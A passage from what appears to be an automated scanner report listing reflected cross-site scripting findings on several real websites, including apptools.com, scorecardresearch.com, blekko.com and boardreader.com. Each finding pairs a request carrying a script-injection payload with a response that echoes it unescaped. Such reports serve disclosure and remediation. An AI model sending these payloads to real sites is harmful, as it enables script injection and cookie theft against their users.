http://apptools.com/styles/apptools.csse507e<script>alert(1)</script>60df3ed154 was not able to be displayed.</p>
...[SNIP]...

4.72. http://apptools.com/styles/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /styles/print.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78363<script>alert(1)</script>31482200f99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles78363<script>alert(1)</script>31482200f99/print.css HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:29 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5122

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/styles78363<script>alert(1)</script>31482200f99/print.css was not able to be displayed.</p>
...[SNIP]...

4.73. http://apptools.com/styles/print.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptools.com
Path:   /styles/print.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7876d<script>alert(1)</script>1b072629eeb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles/print.css7876d<script>alert(1)</script>1b072629eeb HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:40 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5122

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for
http://apptools.com/styles/print.css7876d<script>alert(1)</script>1b072629eeb was not able to be displayed.</p>
...[SNIP]...

4.74. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 9fb5f<script>alert(1)</script>bb7775bca59 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=39fb5f<script>alert(1)</script>bb7775bca59&c2=6035338&c3=5070033&c4=40443113&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:53 GMT
Date: Wed, 02 Feb 2011 15:31:53 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"39fb5f<script>alert(1)</script>bb7775bca59", c2:"6035338", c3:"5070033", c4:"40443113", c5:"59067898", c6:"", c10:"", c15:"", c16:"", r:""});

4.75. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload a97d8<script>alert(1)</script>9a0c4e010c5 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338a97d8<script>alert(1)</script>9a0c4e010c5&c3=5070033&c4=40443113&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:53 GMT
Date: Wed, 02 Feb 2011 15:31:53 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338a97d8<script>alert(1)</script>9a0c4e010c5", c3:"5070033", c4:"40443113", c5:"59067898", c6:"", c10:"", c15:"", c16:"", r:""});

4.76. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 29d7a<script>alert(1)</script>1b41605cfe3 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=507003329d7a<script>alert(1)</script>1b41605cfe3&c4=40443113&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:54 GMT
Date: Wed, 02 Feb 2011 15:31:54 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:"507003329d7a<script>alert(1)</script>1b41605cfe3", c4:"40443113", c5:"59067898", c6:"", c10:"", c15:"", c16:"", r:""});

4.77. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 950d1<script>alert(1)</script>79857982068 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113950d1<script>alert(1)</script>79857982068&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:54 GMT
Date: Wed, 02 Feb 2011 15:31:54 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:"5070033", c4:"40443113950d1<script>alert(1)</script>79857982068", c5:"59067898", c6:"", c10:"", c15:"", c16:"", r:""});

4.78. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 9641e<script>alert(1)</script>c02414cca98 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113&c5=590678989641e<script>alert(1)</script>c02414cca98&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:54 GMT
Date: Wed, 02 Feb 2011 15:31:54 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:"5070033", c4:"40443113", c5:"590678989641e<script>alert(1)</script>c02414cca98", c6:"", c10:"", c15:"", c16:"", r:""});

4.79. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 7176f<script>alert(1)</script>cc305f915b3 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113&c5=59067898&c6=7176f<script>alert(1)</script>cc305f915b3& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:55 GMT
Date: Wed, 02 Feb 2011 15:31:55 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:"5070033", c4:"40443113", c5:"59067898", c6:"7176f<script>alert(1)</script>cc305f915b3", c10:"", c15:"", c16:"", r:""});

4.80. http://blekko.com/autocomplete [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /autocomplete

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload def48<script>alert(1)</script>a050df307b6 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autocomplete?query=xdef48<script>alert(1)</script>a050df307b6 HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
X-Requested-With: XMLHttpRequest
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fbl=2; v=1; sessionid=352926924

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:41:09 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=15
Cache-Control: max-age=43200
Expires: Thu, 03 Feb 2011 07:41:09 GMT
Vary: Accept-Encoding
Content-Length: 71
X-Blekko-PT: 168498ca1c43565ea8d9e21390a38f4b

{"suggestions":[],"query":"xdef48<script>alert(1)</script>a050df307b6"}

4.81. http://blekko.com/autocomplete [term parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /autocomplete

Issue detail

The value of the term request parameter is copied into the HTML document as plain text between tags. The payload d17f0<script>alert(1)</script>b1b056eeebb was submitted in the term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autocomplete?term={searchTerms}d17f0<script>alert(1)</script>b1b056eeebb&lang={language?}&form=opensearch HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:41:04 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Cache-Control: max-age=43200
Expires: Thu, 03 Feb 2011 07:41:04 GMT
Vary: Accept-Encoding
Content-Length: 58
X-Blekko-PT: 9997f158d202984eeb76c315478564b1

["{searchTerms}d17f0<script>alert(1)</script>b1b056eeebb"]

4.82. http://boardreader.com/domain/2mdn.net/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/2mdn.net/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebef7"><script>alert(1)</script>6f696982a6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/2mdn.net/x22?ebef7"><script>alert(1)</script>6f696982a6d=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 19:18:59 GMT
Server: Apache
Pragma:
Cache-Control: no-store, max-age=21600
Expires: Thu, 03 Feb 2011 01:19:01 +0000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/2mdn.net%2Fx22?ebef7"><script>alert(1)</script>6f696982a6d=1">
...[SNIP]...

4.83. http://boardreader.com/domain/2mdn.net/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/2mdn.net/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b358d'-alert(1)-'f4b7b9879fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/2mdn.net/x22?b358d'-alert(1)-'f4b7b9879fc=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 19:19:53 GMT
Server: Apache
Pragma:
Cache-Control: no-store, max-age=21600
